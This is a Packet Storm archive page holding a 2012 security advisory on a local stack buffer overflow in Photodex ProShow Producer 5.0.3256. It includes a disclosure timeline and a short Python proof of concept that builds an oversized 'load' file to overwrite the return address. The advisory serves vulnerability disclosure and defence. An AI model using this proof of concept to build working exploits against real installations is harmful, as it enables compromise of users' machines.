what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Photodex ProShow Producer 5.0.3256 Buffer Overflow

Photodex ProShow Producer 5.0.3256 Buffer Overflow
Posted Jul 2, 2012
Authored by Julien Ahrens

Photodex ProShow Producer version 5.0.3256 suffers from a local buffer overflow vulnerability.

tags | exploit, overflow, local
SHA-256 | 0b8b05ed7b3f945e79239735409a386a1787e080be042c09324706c888d700e7

Photodex ProShow Producer 5.0.3256 Buffer Overflow

Change Mirror Download
Inshell Security Advisory
http://www.inshell.net/


1. ADVISORY INFORMATION
-----------------------
Product: Photodex ProShow Producer
Vendor URL: www.photodex.com
Type: Stack-based Buffer Overflow [CWE-121]
Date found: 2012-06-06
Date published: 2012-07-02
CVSSv2 Score: 6,9 (AV:L/AC:M/Au:N/C:C/I:C/A:C)
CVE: -


2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
Inshell Security.


3. VERSIONS AFFECTED
--------------------
Photodex ProShow Producer v5.0.3256, older versions may be affected too.


4. VULNERABILITY DESCRIPTION
----------------------------
A Local Buffer Overflow Vulnerability has been found on the Photodex
ProShow Producer v5.0.3256.

When starting, the application loads the contents of the "load" file
from its application directory. The application does not validate the
length of the string loaded from the "load" file before passing it to a
buffer, which leads to a Buffer Overflow.

An attacker needs to force the victim to place an arbitrary "load" file
into the application directory.


5. PROOF-OF-CONCEPT (CODE / Exploit)
------------------------------------
#!/usr/bin/python
file="load"

junk1="\x41" * 9848
boom="\x42\x42\x42\x42"
junk2="\x43" * 100

poc=junk1 + boom + junk2

try:
print "[*] Creating exploit file...\n";
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "[*] File successfully created!";
except:
print "[!] Error while creating file!";


For further Screenshots and/or PoCs visit:
http://security.inshell.net/advisory/30


6. SOLUTION
-----------
None


7. REPORT TIMELINE
------------------
2012-06-06: Initial notification sent to vendor
2012-06-12: No response, second notification sent to vendor
2012-06-20: No response, third notification sent to vendor
2012-06-20: Vendor response, sent to appropriate departments
2012-07-02: No further contact by vendor
2012-07-02: Full Disclosure


8. REFERENCES
-------------
http://security.inshell.net/advisory/30
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close